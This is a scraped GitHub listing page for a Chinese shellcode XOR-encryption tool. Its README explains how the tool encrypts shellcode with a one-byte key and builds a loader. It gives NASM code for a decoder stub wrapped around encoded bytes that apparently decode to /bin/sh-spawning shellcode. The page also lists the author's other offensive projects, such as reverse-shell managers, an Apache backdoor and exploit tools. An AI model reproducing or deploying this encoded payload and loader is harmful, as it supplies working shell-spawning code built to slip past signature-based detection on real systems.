WangYihang/XorShellcode

Stars
12
Rank 1,597,372 (Top 32 %)
Language
Python
Created over 7 years ago
Updated over 7 years ago

WangYihang/XorShellcode

WangYihang

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Shellcode异或加密工具

简介 :

shellcode 加密工具

使用方法 :

	python ShellcodeEncrypter.py [SHELLCODE_FILE] [PASSWORD]

原理 :

1. 读取shellcode
2. 根据用户输入的 password 将 shellcode 每一个字节与 password 异或
3. 构建 shellcode 的加载器
4. 将新的 shellcode 写入新的文件

注意事项 :

1. 密码只可以为数字 , 范围是 0 - 255

参考代码 :

global _start
	; this shell code will xor every byte of 'encrypt' segment , then execute them
	; password is 0xe9 = 233
	_start:
		jmp jocker
		loader:
			pop esi ; get address of encrypted shellcode	
			xor ecx, ecx
			mov cl, 21 ; loop times (length of encrypt shellcode)
			decrypt:
				mov al, [esi]
				xor al, 0e9H
				mov [esi], al
				inc esi
				loop decrypt
				jmp encrypt

	jocker:
		call loader
	encrypt:
		db 0d8H
		db 20H
		db 0b8H
		db 81H
		db 0c6H
		db 0c6H
		db 9aH
		db 81H
		db 81H
		db 0c6H
		db 8bH
		db 80H
		db 87H
		db 60H
		db 0aH
		db 83H
		db 0e2H
		db 0b1H
		db 70H
		db 24H
		db 69H

Platypus

🔨 A modern multiple reverse shell sessions manager written in go

GitHacker

🕷️ A `.git` folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.

Webshell-Sniper

🔨 Manage your website via terminal

SourceLeakHacker

🐛 A multi threads web application source leak scanner

ccupp

基于社会工程学的弱口令密码字典生成工具

UsbKeyboardDataHacker

USB键盘流量包取证工具 , 用于恢复用户的击键信息

Reverse-Shell-Manager

🔨 A multiple reverse shell session/client manager via terminal

USB-Mouse-Pcap-Visualizer

USB mouse traffic packet forensic tool, mainly used to draw mouse movements and dragging trajectories

Exploit-Framework

🔥 An Exploit framework for Web Vulnerabilities written in Python

Apache-HTTP-Server-Module-Backdoor

👺 A Simple Backdoor For Apache HTTP Server

MIT-6.031-Readings-zh-cn

麻省理工大学-18年春季学期-软件构造(6.031)课程阅读中文版

awesome-web-security

📓 Some notes and impressive articles of Web Security

Codiad-Remote-Code-Execute-Exploit

A simple exploit to execute system command on codiad

Find-PHP-Vulnerabilities

🐛 A plug-in of sublime 2/3 which is able to find PHP vulnerabilities

PwnMe

二进制渗透题目汇总

IdiomsSolitaire

sqli-labs

WriteUp of sqli-labs (GitBook : https://www.gitbook.com/book/wangyihang/sqli-labs/details)

12306

12306网站抢票Python脚本

WebShellCracker

WebShell密码爆破工具

LinuxShellScript

LinuxShell编程笔记

SQL-Hacker

简单SQL注入工具

Subdomain-Crawler

A program for collecting subdomains of a list of given second-level domains (SLD)

ShellcodeSpider

Shellcode Spider of Exploit-DB

HIT-Courses-Calendar

哈尔滨工业大学教务处课表Excel转换iCal脚本

gojob

Go(od) Job is a simple job scheduler that supports task retries, logging, and task sharding.

Proxy-Verifier

A set of tools designed to efficiently and effectively locate publicly available proxy server resources.

PPT-Generator

Generate PPT via a simple summary

tplayer

一个Linux终端播放器 , 使用字符绘制图片/视频 , 并按照帧率播放

Presentations

t3sec-network-flow-analysis

acw-sc-v2.js

`acw_sc__v2` cookie generator

Docker-Container-Exposer

Expose docker containers to public network

pickle-pickle

A arbitary python code executer via python pickle

CrackMe

Platypus-Python

SimpleEncrypter

简单shellcode加密工具(存在 0 字节)

Markdown-URL-to-Title

DBLP-Spider

A spider tool for downloading the DBLP search results into local BibTeX files.

MovieSearcher

电影资源搜索工具

Image-LSB-Stego

http-grab

tranco-go-package

acw-sc-v2-py

Python requests.HTTPAdapter for `acw_sc__v2`

dns-grab

PrintableShellcodeCreator

可打印shellcode生成工具

DBAPPSecurity-Unified-Security-Management-Python-Connector

Python Connector for DBAPPSecurity Unified Security Management | 明御®运维审计与风险控制系统（堡垒机）

bgphenet

acw-sc-v2-go

ModifyHeadersForChrome

ModifyHeadersForChrome

ProcessInjector

JBrowserWithPulgins

Java实现的一个简单的Web浏览器 , 提供了插件功能 , 目前插件有下载地址分析器